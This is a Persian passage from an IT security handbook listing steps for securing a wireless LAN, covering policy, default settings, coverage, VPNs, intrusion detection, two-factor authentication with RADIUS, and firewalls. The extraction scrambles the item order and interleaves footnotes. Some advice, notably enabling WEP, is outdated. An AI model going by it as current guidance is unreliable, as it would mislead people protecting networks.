‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ‬
‫‪٢١١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ‪WLAN‬‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ‬
‫ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ‪ :‬ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ‪ ،‬ﺑﻮﺩﺟﻪ‪ ،‬ﻣﻨﺎﺑﻊ‪ ،‬ﻭ ﺯﻣﺎﻥ‬
‫ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ‪ .‬ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ‬
‫ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ‪.‬‬
‫ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ‬
‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‪ ،‬ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ‪ .‬ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ‬
‫ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ‬
‫ﺍﺳﺖ‪ ،‬ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ‬
‫ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪:‬‬
‫‪.۲‬‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ‬
‫‪ WLAN‬ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ‪.‬‬
‫‪.۳‬‬
‫ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ‬
‫ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ‪.‬‬
‫‪.۴‬‬
‫ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ‬
‫ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ‬
‫ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﺻﻮ ﹰ‬
‫ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۵‬‬
‫ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ‬
‫ﺍﻃﻼﻋــﺎﺕ ‪ SSID‬ﻳــﺎ ﺁﺩﺭﺱ ‪ IP‬ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ‬
‫ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ‪ SSID .‬ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ‬
‫ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ‪ ،‬ﺑﺨــﺸﻬﺎ‪ ،‬ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ‬
‫ﻣـﺸﺨﺺ ﻛﻨــﺪ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ‪SSID‬‬
‫ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺑـﻪ‬
‫ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ ‪ WEP‬ﺭﺍ ﺑـﺸﻜﻨﺪ‪ ،‬ﺑﺮﺍﺣﺘـﻲ‬
‫ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ‬
‫ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪.۶‬‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ‬
‫ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ‬
‫‪.۸‬‬
‫ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ‪ ،‬ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‪.‬‬
‫ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ‬
‫ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ‪ ۲،۴‬ﮔﻴﮕـﺎﻫﺮﺗﺰ‬
‫ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ‪ ،‬ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫‪.۹‬‬
‫‪ WEP‬ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ‬
‫‪ WEP‬ﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ‬
‫‪٢٠٧‬‬
‫ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪.۱۰‬‬
‫ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ‪ ،‬ﺍﺯ ﺗﻮﻧـﻞ ‪VPN‬‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ‪ .‬ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ‪ VPN‬ﻣﻲﺑﺎﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ‪،‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ ‪ VPN‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ‬
‫ﻣﺜـﻞ ‪ ،Windows 2000 ،Windows 98 SE‬ﻭ‬
‫‪ Windows XP‬ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ .۱۱‬ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‪ ،‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ‬
‫‪٢٠٩‬‬
‫ﺷﺒﻜﻪ )‪ ٢٠٨(NIDS‬ﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪ .۱۲‬ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ‬
‫ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫‪ ۲۰۷‬ﻣﻨﺒﻊ‪NIPC :‬‬
‫‪http://www.nipc.gov/publications/nipcpub/best‬‬
‫‪pract.html‬‬
‫‪208 Network Based Intrusion Detection System‬‬
‫‪ ۲۰۹‬ﻣﻨﺒﻊ‪ ،Chris Bateman :‬ﺗﺤﻠﻴﻠﮕﺮ ‪CERT‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪.۱‬‬
‫ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ‬
‫ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۷‬‬
‫ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ‬
‫ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ‪ .‬ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ‬
‫ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ‬
‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛‬
‫ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ‬
‫ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬
‫‪٢١٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪ .۱۳‬ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ‪ ٢١٠‬ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺩﻭ‬
‫ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪ .‬ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ‬
‫ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ‬
‫ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ‪ ٢١١.‬ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ‪ ٢١٢RADIUS‬ﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ‬
‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ‬
‫ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ RADIUS‬ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ‬
‫ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪ RADIUS‬ﻣﺜـﻞ‬
‫‪٢١٣‬‬
‫ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ‪ ،‬ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪ .۱۴‬ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ ‪ gateway‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ ٢١٤.‬ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ‬
‫ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ‪ ٢١٥‬ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ‬
‫ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ‬
‫ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﺜــﻞ ‪ IPSec‬ﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ‪ VPN‬ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ‬
‫‪210 Two Factor Authentication‬‬
‫‪ Bateman ۲۱۱‬ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ ‪e-thenticator‬‬
‫ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖ‬
‫ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪212 Remote Authentication Dial-In User Service‬‬
‫‪ RADIUS ۲۱۳‬ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"‪،‬‬
‫ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ‪ .‬ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ ‪RADIUS‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‪-‬‬
‫ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ RADIUS‬ﺍﺳــﺖ‪ .‬ﺷــﺒﻜﻪﻫــﺎﻱ‬
‫ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪VPN‬ﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ‪ ،‬ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ RADIUS‬ﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ‬
‫ﮔﺸﺖ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ‬
‫ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ‪ .‬ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ‪ ،‬ﺭﻣﺰﮔــﺬﺍﺭﻱ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ RADIUS‬ﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ‪.‬‬
‫‪ ،Rick Fleming ۲۱۴‬ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ ‪Digital‬‬
‫‪Defense‬‬
‫‪215 Dual Homed‬‬
‫ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ‬
‫ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ .‬ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
